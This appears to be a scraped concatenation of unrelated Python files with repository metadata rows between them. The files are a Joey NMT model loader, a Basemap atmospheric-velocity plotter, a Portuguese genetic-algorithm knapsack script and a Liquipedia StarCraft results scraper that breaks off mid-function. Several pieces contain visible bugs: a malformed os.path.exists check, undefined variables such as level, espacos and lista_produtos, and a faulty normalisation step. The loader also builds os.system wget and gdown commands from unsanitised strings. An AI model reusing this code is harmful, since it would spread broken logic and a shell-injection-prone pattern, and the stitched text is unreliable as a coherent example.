src_bpe_path = os.path.join(model_dir, 'src.bpe.model')
trg_bpe_path = os.path.join(model_dir, 'trg.bpe.model')
if not os.path.exists in [ckpt_path, src_vocab_path, trg_vocab_path, config_path, src_bpe_path, trg_bpe_path]:
URL = "https://zenodo.org/record/7636723/files/" + \
src_language + "-" + tgt_language
if domain == "":
URL += "-baseline.zip?download=1"
else:
URL += "-" + domain + "-baseline.zip?download=1"
http_response = urlopen(URL)
zipfile = ZipFile(BytesIO(http_response.read()))
zipfile.extractall(path=model_dir)
# Rename config file to config_orig.yaml.
os.rename(os.path.join(model_dir, 'config.yaml'), config_path)
# Adjust config.
config = load_config(config_path)
new_config_file = os.path.join(model_dir, 'config.yaml')
config = self._update_config(config, src_vocab_path, trg_vocab_path,
model_dir, ckpt_path)
with open(new_config_file, 'w') as cfile:
yaml.dump(config, cfile)
print('Downloaded model for {}-{}.'.format(src_language, tgt_language))
def load_model(self, src_language, tgt_language, domain, bpe_src_code=None, tokenize=None):
""" Load model for given trg language. """
model_dir = f"{self._model_dir_prefix}{src_language}-{tgt_language}-{domain}"
ckpt_path = os.path.join(model_dir, 'model.ckpt')
src_vocab_path = os.path.join(model_dir, 'src_vocab.txt')
trg_vocab_path = os.path.join(model_dir, 'trg_vocab.txt')
config_path = os.path.join(model_dir, 'config_orig.yaml')
# Adjust config.
config = load_config(config_path)
new_config_file = os.path.join(model_dir, 'config.yaml')
config = self._update_config(config, src_vocab_path, trg_vocab_path,
model_dir, ckpt_path)
with open(new_config_file, 'w') as cfile:
yaml.dump(config, cfile)
print('Loaded model for {}-{}.'.format(src_language, tgt_language))
conf = {}
logger = logging.getLogger(__name__)
conf["logger"] = logger
# load the Joey configuration
cfg = load_config(new_config_file)
# load the checkpoint
if "load_model" in cfg['training'].keys():
ckpt = cfg['training']["load_model"]
else:
ckpt = get_latest_checkpoint(model_dir)
if ckpt is None:
raise FileNotFoundError("No checkpoint found in directory {}."
.format(model_dir))
# prediction parameters from config
conf["use_cuda"] = cfg["training"].get(
"use_cuda", False) if torch.cuda.is_available() else False
conf["level"] = cfg["data"]["level"]
conf["max_output_length"] = cfg["training"].get(
"max_output_length", None)
conf["lowercase"] = cfg["data"].get("lowercase", False)
# load the vocabularies
src_vocab_file = cfg["training"]["model_dir"] + "/src_vocab.txt"
trg_vocab_file = cfg["training"]["model_dir"] + "/trg_vocab.txt"
conf["src_vocab"] = build_vocab(field="src", vocab_file=src_vocab_file,
dataset=None, max_size=-1, min_freq=0)
conf["trg_vocab"] = build_vocab(field="trg", vocab_file=trg_vocab_file,
dataset=None, max_size=-1, min_freq=0)
# whether to use beam search for decoding, 0: greedy decoding
if "testing" in cfg.keys():
conf["beam_size"] = cfg["testing"].get("beam_size", 0)
conf["beam_alpha"] = cfg["testing"].get("alpha", -1)
else:
conf["beam_size"] = 1
conf["beam_alpha"] = -1
# pre-processing
if tokenize is not None:
src_tokenizer = MosesTokenizer(lang=cfg["data"]["src"])
trg_tokenizer = MosesDetokenizer(lang=cfg["data"]["trg"])
# tokenize input
def tokenizer(x): return src_tokenizer.tokenize(x, return_str=True)
def detokenizer(x): return trg_tokenizer.detokenize(
x.split(), return_str=True)
else:
def tokenizer(x): return x
def detokenizer(x): return x
if bpe_src_code is not None and level == "bpe":
# load bpe merge file
merge_file = open(bpe_src_code, "r")
bpe = apply_bpe.BPE(codes=merge_file)
def segmenter(x): return bpe.process_line(x.strip())
elif conf["level"] == "char":
# split to chars
def segmenter(x): return list(x.strip())
else:
def segmenter(x): return x.strip()
conf["preprocess"] = [tokenizer, segmenter]
conf["postprocess"] = [detokenizer]
# build model and load parameters into it
model_checkpoint = load_checkpoint(ckpt, conf["use_cuda"])
model = build_model(
cfg["model"], src_vocab=conf["src_vocab"], trg_vocab=conf["trg_vocab"])
model.load_state_dict(model_checkpoint["model_state"])
if conf["use_cuda"]:
model.cuda()
conf["model"] = model
print("Joey NMT model loaded successfully.")
return conf
def _update_config(self, config, new_src_vocab_path, new_trg_vocab_path,
new_model_dir, new_ckpt_path):
"""Overwrite the settings in the given config."""
config['data']['src_vocab'] = new_src_vocab_path
if config['model'].get('tied_embeddings', False):
config['data']['trg_vocab'] = new_src_vocab_path
else:
config['data']['trg_vocab'] = new_trg_vocab_path
config['training']['model_dir'] = new_model_dir
config['training']['load_model'] = new_ckpt_path
return config
def _is_lowercase(self, src_vocab_path):
# Infer whether the model is built on lowercased data.
lowercase = True
with open(src_vocab_path, 'r') as ofile:
for line in ofile:
if line != line.lower():
lowercase = False
break
return lowercase
# Doesn't look like these functions are ever called...
def _download_gdrive_file(self, file_id, destination):
"""Download a file from Google Drive and store in local file."""
download_link = 'https://drive.google.com/uc?id={}'.format(file_id)
os.system(f'gdown -q -O {destination} {download_link}')
def _download_github_file(self, github_raw_path, destination):
"""Download a file from GitHub."""
os.system(f'wget -q -O {destination} {github_raw_path}')
def _download(self, url, destination):
"""Download file from Github or Googledrive."""
try:
if 'drive.google.com' in url:
if url.startswith('https://drive.google.com/file'):
file_id = url.split("/")[-1]
elif url.startswith('https://drive.google.com/open?'):
file_id = url.split('id=')[-1]
self._download_gdrive_file(file_id, destination)
else:
self._download_github_file(url, destination)
except:
print("Download failed, didn't recognize url {}.".format(url))
| dsfsi/masakhane-web | src/server/core/model_load.py | model_load.py | py | 10,260 | python | en | code | 34 | github-code | 1 | [
{
"api_name": "os.environ.get",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_num... |
15162386829 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
def down_sample(a):
tmp=[]
for t in a:
tmp.append(t[3::4])
return tmp[3::4]
def draw_velocity(time, output_dir, data_dir):
v = np.fromfile(data_dir + '/bin_data/atm_v_time_{}_iter_n_layer_0.bin'.format(time),'<f8')
w = np.fromfile(data_dir + '/bin_data/atm_w_time_{}_iter_n_layer_0.bin'.format(time),'<f8')
h = np.fromfile(data_dir + '/bin_data/atm_h_time_{}_iter_n_layer_0.bin'.format(time),'<f8')
vm = np.sqrt(v**2+w**2)
vm[vm==0] = 1
v = v/vm
w = w/vm
x = np.linspace(-180, 180, 361)
y = np.linspace(-90, 90, 181)
xv, yv = np.meshgrid(x, y)
#print xv
#print yv
figure = plt.figure(figsize=(15, 8))
m = Basemap(llcrnrlon=-180,llcrnrlat=-90,urcrnrlon=180,urcrnrlat=90,projection='cyl', lon_0=0)
xi, yi = m(xv.flatten(), yv.flatten())
xi = xi.reshape((181,361))
yi = yi.reshape((181,361))
vm = vm.reshape((181,361))
w = w.reshape((181,361))
v = v.reshape((181,361))
h = h.reshape((181,361))
wn = down_sample(w)
vn = down_sample(-v)
wn = wn / np.sqrt(np.square(wn) + np.square(vn))
vn = vn / np.sqrt(np.square(wn) + np.square(vn))
cs = m.quiver(down_sample(xi), down_sample(yi), wn, vn, down_sample(vm), width=0.001,
headlength=7, headwidth=5, pivot='tail', clim=[0, 1.2], cmap='jet')
m.contour( xi, yi, h, colors ='k', linewidths= 0.3 )
m.drawparallels(np.arange(-90., 90., 10.), labels=[1,0,0,0], fontsize=10)
m.drawmeridians(np.arange(-180., 180., 45.), labels=[0,0,0,1], fontsize=10)
cbar = m.colorbar(cs, location='bottom', pad="10%", label='Velocity (m/s)')
plt.title("Atmospheric Velocity at {0}Ma".format(time))
plt.savefig(output_dir + '/{}Ma_velocity.png'.format(time), bbox_inches='tight')
plt.close()
if __name__ == "__main__":
draw_velocity(0, '../benchmark/output/atm_maps/velocity/', '../benchmark/output/')
draw_velocity(5, '../benchmark/output/atm_maps/velocity/', '../benchmark/output/')
| atom-model/ATOM | utils/draw_atm_velocities.py | draw_atm_velocities.py | py | 2,177 | python | en | code | 13 | github-code | 1 | [
{
"api_name": "matplotlib.use",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"lin... |
2453043535 | from random import random
import matplotlib.pyplot as plt
class AlgoritmoGenetico():
def __init__(self, tamanho_populacao):
self.tamanho_populacao = tamanho_populacao
self.populacao = []
self.geracao = 0
self.melhor_solucao = 0
self.lista_solucoes = []
def inicializa_populacao(self, espacos, valores, limite_espacos):
for i in range(self.tamanho_populacao):
self.populacao.append(Individuo(espacos, valores, limite_espacos))
self.melhor_solucao = self.populacao[0]
def ordena_populacao(self):
self.populacao = sorted(self.populacao,
key = lambda populacao: populacao.nota_avaliacao,
reverse = True)
def melhor_individuo(self, individuo):
if individuo.nota_avaliacao > self.melhor_solucao.nota_avaliacao:
self.melhor_solucao = individuo
def soma_avaliacoes(self):
soma = 0
for individuo in self.populacao:
soma += individuo.nota_avaliacao
return soma
def seleciona_pai(self, soma_avaliacao):
pai = -1
valor_sorteado = random() * soma_avaliacao
soma = 0
i = 0
while i < len(self.populacao) and soma < valor_sorteado:
soma += self.populacao[i].nota_avaliacao
pai += 1
i += 1
return pai
def visualiza_geracao(self):
melhor = self.populacao[0]
print("G:%s -> Valor: %s Espaço: %s Cromossomo: %s" % (self.populacao[0].geracao,
melhor.nota_avaliacao,
melhor.espaco_usado,
melhor.cromossomo))
def resolver(self, taxa_mutacao, numero_geracoes, espacos, valores, limite_espacos):
self.inicializa_populacao(espacos, valores, limite_espacos)
for individuo in self.populacao:
individuo.avaliacao()
self.ordena_populacao()
self.melhor_solucao = self.populacao[0]
self.lista_solucoes.append(self.melhor_solucao.nota_avaliacao)
self.visualiza_geracao()
for geracao in range(numero_geracoes):
soma_avaliacao = self.soma_avaliacoes()
nova_populacao = []
for individuos_gerados in range(0, self.tamanho_populacao, 2):
pai1 = self.seleciona_pai(soma_avaliacao)
pai2 = self.seleciona_pai(soma_avaliacao)
filhos = self.populacao[pai1].crossover(self.populacao[pai2])
nova_populacao.append(filhos[0].mutacao(taxa_mutacao))
nova_populacao.append(filhos[1].mutacao(taxa_mutacao))
self.populacao = list(nova_populacao)
for individuo in self.populacao:
individuo.avaliacao()
self.ordena_populacao()
self.visualiza_geracao()
melhor = self.populacao[0]
self.lista_solucoes.append(melhor.nota_avaliacao)
self.melhor_individuo(melhor)
print("\nMelhor solução -> G: %s Valor: %s Espaço: %s Cromossomo: %s" %
(self.melhor_solucao.geracao,
self.melhor_solucao.nota_avaliacao,
self.melhor_solucao.espaco_usado,
self.melhor_solucao.cromossomo))
return self.melhor_solucao.cromossomo
if __name__ == '__main__':
limite = 3
tamanho_populacao = 20
taxa_mutacao = 0.01
numero_geracoes = 100
ag = AlgoritmoGenetico(tamanho_populacao)
resultado = ag.resolver(taxa_mutacao, numero_geracoes, espacos, valores, limite)
for i in range(len(lista_produtos)):
if resultado[i] == '1':
print("Nome: %s R$ %s " % (lista_produtos[i].nome,
lista_produtos[i].valor))
#for valor in ag.lista_solucoes:
# print(valor)
plt.plot(ag.lista_solucoes)
plt.title("Acompanhamento dos valores")
plt.show()
| josuelaiber/Civil_Final_Project | curso/Algoritmos Genéticos em Python/13.py | 13.py | py | 4,418 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "random.random",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 116,
"usage_type": "name"
},
{
"api_name": "matplotlib.p... |
38639273059 | import numpy as np
import matplotlib.pyplot as plt
import iris.plot as iplt
from irise import convert, diagnostics, variable
from myscripts.models.um import case_studies
import tropopause
pvtrop = 3.5
pvname = 'ertel_potential_vorticity'
dz = np.linspace(-2000, 2000, 21)
def main(cubes):
"""
"""
# Calulate N^2
theta = convert.calc('air_potential_temperature', cubes)
nsq = variable.N_sq(theta)
# Find the tropopause
ztrop, fold_t, fold_b = tropopause.height(cubes)
# Mask ridges and troughs
ridges, troughs = tropopause.ridges_troughs(cubes)
# Create profile of N_sq vs tropopause
for name, mask in [('troughs', ridges), ('ridges', troughs)]:
cube = diagnostics.profile(nsq, ztrop, dz, mask=mask)[0]
iplt.plot(cube, cube.coords()[0], label=name)
plt.axhline(color='k')
plt.xlabel(r'$N^2$ $s^{-1}$')
plt.ylabel('Distance from the tropopause')
plt.legend(loc='best')
plt.title('Tropopause PV = %.1f' % pvtrop)
plt.show()
if __name__ == '__main__':
forecast = case_studies.iop8.copy()
cubes = forecast.set_lead_time(hours=24)
main(cubes)
| leosaffin/scripts | myscripts/tropopause/inversion_layer.py | inversion_layer.py | py | 1,141 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "numpy.linspace",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "irise.convert.calc",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "irise.convert",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "irise.variable.N_sq",... |
33931275405 | # https://www.acmicpc.net/problem/7576
# 토마토
from collections import deque
M, N = map(int, input().split()) #col row
board = []
for _ in range(N):
board.append(list(map(int, input().split())))
def bfs():
global M, N, board
queue = deque()
for i in range(N):
for j in range(M):
if board[i][j] == 1:
queue.append((i,j))
dr, dc = (1,-1,0,0), (0,0,-1,1)
while queue:
r,c = queue.popleft()
for i in range(4):
nr, nc = r+dr[i], c+dc[i]
if nr<0 or nr>=N or nc<0 or nc>=M:
continue
if board[nr][nc] == 0:
queue.append((nr, nc))
board[nr][nc] = board[r][c] + 1
answer = 0
for i in range(N):
for j in range(M):
if board[i][j] == 0:
return -1
elif board[i][j] > answer:
answer = board[i][j]
return answer-1
print(bfs())
| progjs/coding_test | 백준/7576.py | 7576.py | py | 960 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 13,
"usage_type": "call"
}
] |
14285320497 | """ Forms Motors. """
from datetime import date
from django import forms
class MotorForm(forms.Form):
""" Formularios para oferta de mobliliarios. """
FUEL_CHOICES = [
('Nafta', 'Nafta'),
('Diesel', 'Diesel'),
('Alcohol', 'Alcohol'),
('Flex', 'Flex'),
('Eléctrico', 'Eléctrico'),
]
TRANSMISSION_CHOICES = [
('manual', 'Manual'),
('automatic', 'Automática'),
]
YEAR_CHOICES = [(year, year)
for year in range(1886, date.today().year + 1)]
# Unico de Motor
brand = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Marca',
max_length=255,
min_length=1,
required=True,
)
model = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Modelo',
max_length=255,
min_length=1,
required=True,
)
fuel = forms.ChoiceField(
widget=forms.Select(attrs={'class': 'form-control'}),
label='Combustible',
choices=FUEL_CHOICES,
required=True,
)
transmission = forms.ChoiceField(
widget=forms.Select(attrs={'class': 'form-control'}),
label='Transmisión',
choices=TRANSMISSION_CHOICES,
required=True,
)
year = forms.ChoiceField(
widget=forms.Select(attrs={'class': 'form-control'}),
label='Año',
required=True,
choices=YEAR_CHOICES,
initial=date.today().year,
)
color = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Color',
max_length=255,
min_length=4,
required=True,
)
# Compartido con BaseClass
title = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Título',
max_length=255,
min_length=1,
required=True,
)
description = forms.CharField(
widget=forms.Textarea(attrs={'class': 'form-control'}),
label='Descripción',
max_length=255,
min_length=1,
required=True,
)
location = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Ubicación',
max_length=255,
min_length=4,
required=True,
)
price = forms.IntegerField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Precio',
min_value=1,
required=True,
error_messages={
'invalid': 'Por favor, ingrese un número válido para el precio.',
}
)
phone1 = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Celular 1',
min_length=8,
required=True,
error_messages={
'invalid': 'Por favor, ingrese un número de contacto válido',
}
)
phone2 = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Celular 2',
min_length=8,
required=False
)
email = forms.EmailField(
widget=forms.TextInput(attrs={'class': 'form-control'}),
label='Email',
error_messages={
'invalid': 'Por favor, ingrese un email válido.',
}
)
images = forms.ImageField(
widget=forms.FileInput(attrs={'class': 'form-control'}),
label='Imagen',
required=False,
)
| Seph1986/202306_nemu_market | apps/motor_app/forms.py | forms.py | py | 3,469 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.forms.Form",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "datetime.date.today",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "datetime.date",... |
28987569197 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at https://mozilla.org/MPL/2.0/.
from __future__ import annotations
import pandas as pd
import numpy as np
from typing import Iterable, Callable, Any
def unpack_column(
table: pd.DataFrame, column_description: dict, table_name: str
) -> pd.DataFrame:
"""Validates a column in a pandas DataFrame
Args:
table (pandas.DataFrame): A table containing the column at the index
specified by column_description
column_description (dict): A dictionary with the following supported
keys:
- name: the name of the column, which is assigned to the column
label to the result table returned by this function
- index: the zero based index of the column in the table's
ordered columns
- type: (optional) the column will be converted (if necessary to
this type) If the conversion is not possible for a value
at any row, an error is raised.
- min_value: (optional) inclusive minimum value constraint.
- max_value: (optional) inclusive maximum value constraint.
table_name (str): the name of the table being processed, purely
for error feedback when an error occurs.
Raises:
ValueError: the values in the column were not convertable to the
specified column description type
ValueError: a min_value or max_value was specified without specifying
type in column description
ValueError: the min_value or max_value constraint was violated by the
value in the column.
Returns:
pandas.DataFrame: the resulting table
"""
data = table.iloc[:, column_description["index"]].copy()
col_name = column_description["name"]
if "type" in column_description:
if data.isna().any():
try:
data = data.astype("object")
data.loc[data.notna()] = data.loc[data.notna()].astype(
column_description["type"]
)
except ValueError:
raise ValueError(
f"{table_name} table, column: '{col_name}' contains "
"values that cannot be converted to: "
f"'{column_description['type']}'"
)
else:
data = data.astype(column_description["type"])
if "min_value" in column_description:
if "type" not in column_description:
raise ValueError("type required with min_value")
min_value = column_description["min_value"]
if len(data[data < min_value]):
raise ValueError(
f"{table_name} table, column: '{col_name}' contains values "
f"less than the minimum allowed value: {min_value}"
)
if "max_value" in column_description:
if "type" not in column_description:
raise ValueError("type required with max_value")
max_value = column_description["max_value"]
if len(data[data > max_value]):
raise ValueError(
f"{table_name} table, column: '{col_name}' contains values "
f"greater than the maximum allowed value: {max_value}"
)
return data
def _list_duplicates(seq: Iterable) -> list:
"""
get the list of duplicate values in the specified sequence
https://stackoverflow.com/questions/9835762/how-do-i-find-the-duplicates-in-a-list-and-create-another-list-with-them
Args:
seq (iterable): a sequence of comparable values
Returns:
list: the list of values that appear at least 2 times in the input
"""
seen = set()
seen_add = seen.add
# adds all elements it doesn't know yet to seen and all other to seen_twice
seen_twice = set(x for x in seq if x in seen or seen_add(x))
# turn the set into a list (as requested)
return list(seen_twice)
def unpack_table(
table: pd.DataFrame, column_descriptions: list[dict], table_name: str
) -> pd.DataFrame:
"""Validates and assigns column names to a column-ordered table using
the specified list of column descriptions. Any existing column labels
on the specified table are ignored.
Args:
table (pandas.DataFrame): a column ordered table to validate
column_descriptions (list): a list of dictionaries with describing the
columns. See :py:func:`unpack_column` for how this is used
table_name (str): the name of the table being processed, purely
for error feedback when an error occurs.
Raises:
ValueError: a duplicate column name was detected
Returns:
pandas.DataFrame: a type-validated table with columns replaced with
the contents of column_descriptions.
"""
cols = [x["name"] for x in column_descriptions]
duplicates = _list_duplicates(cols)
if duplicates:
# this could potentially happen if a classifier is named the same
# thing as another column
raise ValueError(f"duplicate column names detected: {duplicates}")
data = {
x["name"]: unpack_column(table, x, table_name)
for x in column_descriptions
}
return pd.DataFrame(columns=cols, data=data)
def _try_get_int(s) -> int:
"""
Checks if the specified value is an integer, and returns a result
Args:
s (any): a value to test
Returns:
tuple: (int(s), True) if the value can be converted to an integer,
and otherwise (None, False)
"""
try:
i = int(s)
return i, True
except ValueError:
return None, False
def get_parse_bool_func(
table_name: str, colname: str
) -> Callable[[Any], bool]:
"""gets a boolean-like value to boolean parse function according to the
SIT specification. The parameters are used to create a friendly error
message when a parse failure occurs.
Args:
table_name (str): Table name to be used in failure error message
colname (str): Column name to be used in failure error message
Returns:
func: a boolean-like value to bool parse function
"""
def parse_bool(x: Any) -> bool:
"""Converts the specified value to a boolean according to SIT
specification, or raises an error.
Args:
x (varies): a value to convert to boolean
Raises:
ValueError: The specified value was not convertable to boolean
Returns:
boolean: The converted value
"""
if isinstance(x, bool):
return x
elif isinstance(x, int):
# the sit format treats negatives as False for boolean fields
return x > 0
else:
str_x = str(x).lower()
int_x, success = _try_get_int(str_x)
if success:
return int_x > 0
if str_x in ["true", "t", "y"]:
return True
elif str_x in ["false", "f", "n"]:
return False
else:
raise ValueError(
f"{table_name}: cannot parse value: '{x}' in "
f"column: '{colname}' as a boolean"
)
return parse_bool
def substitute_using_age_class_rows(
rows: pd.DataFrame,
parse_bool_func: Callable[[Any], bool],
age_classes: pd.DataFrame,
) -> pd.DataFrame:
"""Substitute age class criteria values that appear in SIT transition
rules or disturbance events data into age values.
Checks that min softwood age equals min hardwood age and max softwood
age equals max hardwood age since CBM does not carry separate HW/SW ages.
Args:
rows (pandas.DataFrame): sit data containing columns that describe age
eligibility:
- using_age_class
- min_softwood_age
- min_hardwood_age
- max_softwood_age
- max_hardwood_age
parse_bool_func (func): a function that maps boolean-like values to
boolean. Passed to the pandas.Series.map function for the
using_age_class column.
age_classes (pandas.DataFrame): [description]
Raises:
ValueError: values found in the age eligibility columns are not
defined identifiers in the specified age classes table.
ValueError: hardwood and softwood age criteria were not identical.
Returns:
pandas.DataFrame: the input table with age values criteria substituted
for age class criteria.
"""
rows.using_age_class = rows.using_age_class.map(parse_bool_func)
non_using_age_class_rows = rows.loc[~rows.using_age_class]
using_age_class_rows = rows.loc[rows.using_age_class].copy()
for age_class_criteria_col in [
"min_softwood_age",
"min_hardwood_age",
"max_softwood_age",
"max_hardwood_age",
]:
valid_age_classes = np.concatenate(
[age_classes.name.unique(), np.array(["-1"])]
)
age_class_ids = (
using_age_class_rows[age_class_criteria_col].astype(str).unique()
)
undefined_age_classes = np.setdiff1d(age_class_ids, valid_age_classes)
if len(undefined_age_classes) > 0:
raise ValueError(
f"In column {age_class_criteria_col}, the following age class "
f"identifiers: {undefined_age_classes} are not defined in SIT "
"age classes."
)
age_class_start_year_map = {
x.name: int(x.start_year) for x in age_classes.itertuples()
}
age_class_end_year_map = {
x.name: int(x.end_year) for x in age_classes.itertuples()
}
using_age_class_rows.min_softwood_age = (
using_age_class_rows.min_softwood_age.astype(str).map(
age_class_start_year_map
)
)
using_age_class_rows.min_hardwood_age = (
using_age_class_rows.min_hardwood_age.astype(str).map(
age_class_start_year_map
)
)
using_age_class_rows.max_softwood_age = (
using_age_class_rows.max_softwood_age.astype(str).map(
age_class_end_year_map
)
)
using_age_class_rows.max_hardwood_age = (
using_age_class_rows.max_hardwood_age.astype(str).map(
age_class_end_year_map
)
)
# if the above mapping fails, it results in Nan values in the failed rows,
# this replaces those with -1
using_age_class_rows.min_softwood_age = (
using_age_class_rows.min_softwood_age.fillna(-1)
)
using_age_class_rows.min_hardwood_age = (
using_age_class_rows.min_hardwood_age.fillna(-1)
)
using_age_class_rows.max_softwood_age = (
using_age_class_rows.max_softwood_age.fillna(-1)
)
using_age_class_rows.max_hardwood_age = (
using_age_class_rows.max_hardwood_age.fillna(-1)
)
# return the final substituted rows
result = pd.concat(
[non_using_age_class_rows, using_age_class_rows]
).reset_index(drop=True)
# convert to float then to int in case the columns are stored as
# strings in float format (which fails on astype(int))
result.min_softwood_age = result.min_softwood_age.astype(float).astype(int)
result.min_hardwood_age = result.min_hardwood_age.astype(float).astype(int)
result.max_softwood_age = result.max_softwood_age.astype(float).astype(int)
result.max_hardwood_age = result.max_hardwood_age.astype(float).astype(int)
# check that all age criteria are identical between SW and HW (since CBM
# has only a stand age)
has_null_min_age_criteria = (result.min_softwood_age < 0) | (
result.min_hardwood_age < 0
)
has_null_max_age_criteria = (result.max_softwood_age < 0) | (
result.max_hardwood_age < 0
)
differing_age_criteria = result.loc[
(
(result.min_softwood_age != result.min_hardwood_age)
& ~has_null_min_age_criteria
)
| (
(result.max_softwood_age != result.max_hardwood_age)
& ~has_null_max_age_criteria
)
]
if len(differing_age_criteria) > 0:
raise ValueError(
"Values of column min_softwood_age must equal values of column "
"min_hardwood_age, and values of column max_softwood_age must "
"equal values of column max_hardwood_age since CBM defines only "
"a stand age and does not track hardwood and softwood age "
"seperately."
)
return result
| cat-cfs/libcbm_py | libcbm/input/sit/sit_parser.py | sit_parser.py | py | 12,741 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "pandas.DataFrame",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "typing.Iterable",
"line_number": 84,
"usage_type": "name"
},
{
"api_name": "pandas.Da... |
15626371570 | import requests
import re
import datetime
from dateutil import parser
import time
from PIL import Image, ImageDraw, ImageFont
import urllib.parse
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import os
import pickle
import codecs
HEADER = {'User-Agent': 'Live Match Results Ticker (beomulf@gmail.com)'}
S = requests.Session()
URL = "https://liquipedia.net/starcraft2/api.php"
HEADER = {'User-Agent': 'Live Match Results Ticker (beomulf@gmail.com)'}
TIMEZONES = {'CEST': '+02:00', 'EDT': '-04:00'}
RACELIBRARY = {'T': 'Terran', 'P': 'Protoss', 'Z': 'Zerg', 'R': 'Random'}
def build_ticker_DH_NA_groups(pageid, prepend=''):
params = {
'action': "parse",
'pageid': pageid,
'prop': 'wikitext',
'section': 6,
'format': "json"
}
""" Parse a section of a page, fetch its table data and save it to a CSV file
"""
res = S.get(url=URL, params=params, headers=HEADER)
data = res.json()
wikitext = data['parse']['wikitext']['*']
lines = wikitext.split('|-')
matches = {}
table = lines[0].split('{{HiddenSort')
del table[0]
for group in table:
match_list = re.split('\|M[0-9]|<', group)
group_name = group[1:8] + ' | '
del match_list[0]
player_names = re.split('\|p[0-9]=', group)
del player_names[0]
player_names_list = [x.split('|')[0].split('=') for x in player_names[0:8]]
player_names_list = [x[0] for x in player_names_list]
results_dict = dict.fromkeys(player_names_list)
for key in player_names_list:
results_dict[key] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0, 'Match Losses': 0}
matches[group_name] = []
for match in match_list:
if 'opponent1' in match:
if 'bestof=5' in match:
break
subseries = match.split(' ')
dateinfo = match.split('date=')[1].split('|')[0]
date = dateinfo.split('{{')
date = date[0] + re.sub('[a-z |{|}|\/]', '', date[1]).replace('\n', '')
for zone, offset in TIMEZONES.items():
try:
date = date.replace(zone, offset)
except:
print('Invalid Timezone')
date = parser.parse(date)
currentTime = datetime.datetime.now(datetime.timezone.utc).astimezone()
timeDiff = abs(currentTime-date)
timeDiff = timeDiff.days * 24 + timeDiff.seconds // 3600
manual_score_flag = False
p1_score = 0
p2_score = 0
for line in subseries:
if 'opponent1' in line:
if re.search('\|1=', line):
p1 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
else:
p1 = line.split('|')[2].replace('}}\n', '').split('p1=')[0]
if 'score' in line:
p1_score = line.split('score=')[1].split('}')[0]
else:
manual_score_flag = True
elif 'opponent2' in line:
if re.search('\|1=', line):
p2 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
else:
p2 = line.split('|')[2].replace('}}\n', '').split('p1=')[0]
if 'score' in line:
p2_score = line.split('score=')[1].split('}')[0]
else:
manual_score_flag = True
if 'walkover=1' in line:
p1_score = 'W'
p2_score = 'L'
elif 'walkover=2' in line:
p1_score = 'L'
p2_score = 'W'
elif manual_score_flag and 'winner' in line:
winner_id = line.split('winner=')[1].split('}')[0].partition('|')
winner_id = winner_id[0]
if winner_id == '1':
p1_score += 1
elif winner_id == '2':
p2_score += 1
if p1_score == '':
p1_score = '0'
if p2_score == '':
p2_score = '0'
if p1 not in results_dict:
results_dict[p1] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0,
'Match Losses': 0}
if p2 not in results_dict:
results_dict[p2] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0,
'Match Losses': 0}
results_dict[p1]['Map Wins'] += p1_score
results_dict[p2]['Map Wins'] += p2_score
results_dict[p1]['Map Losses'] += p2_score
results_dict[p2]['Map Losses'] += p1_score
results_dict[p1]['Map Diff'] += p1_score - p2_score
results_dict[p2]['Map Diff'] += p2_score - p1_score
if p1_score >= 2 or p2_score >= 2:
if p1_score > p2_score:
results_dict[p1]['Match Wins'] += 1
results_dict[p2]['Match Losses'] += 1
if p2_score > p1_score:
results_dict[p2]['Match Wins'] += 1
results_dict[p1]['Match Losses'] += 1
if timeDiff < 10:
if p1 != '':
if p1 != 'BYE' and p2 != 'BYE':
matches[group_name].append(
' ' + p1 + ' ' + str(p1_score) + '-' + str(p2_score) + ' ' + p2 + ' ')
elif p1 == 'BYE':
matches[group_name].append(' ' + p2 + ' (Bye) ')
elif p2 == 'BYE':
matches[group_name].append(' ' + p1 + ' (Bye) ')
if p1 == '':
p1 = 'TBD'
if p2 == '':
p2 = 'TBD'
generate_group_standings_img(group_name, results_dict)
matchlist = []
for key in matches.keys():
if matches[key] != []:
if prepend != '':
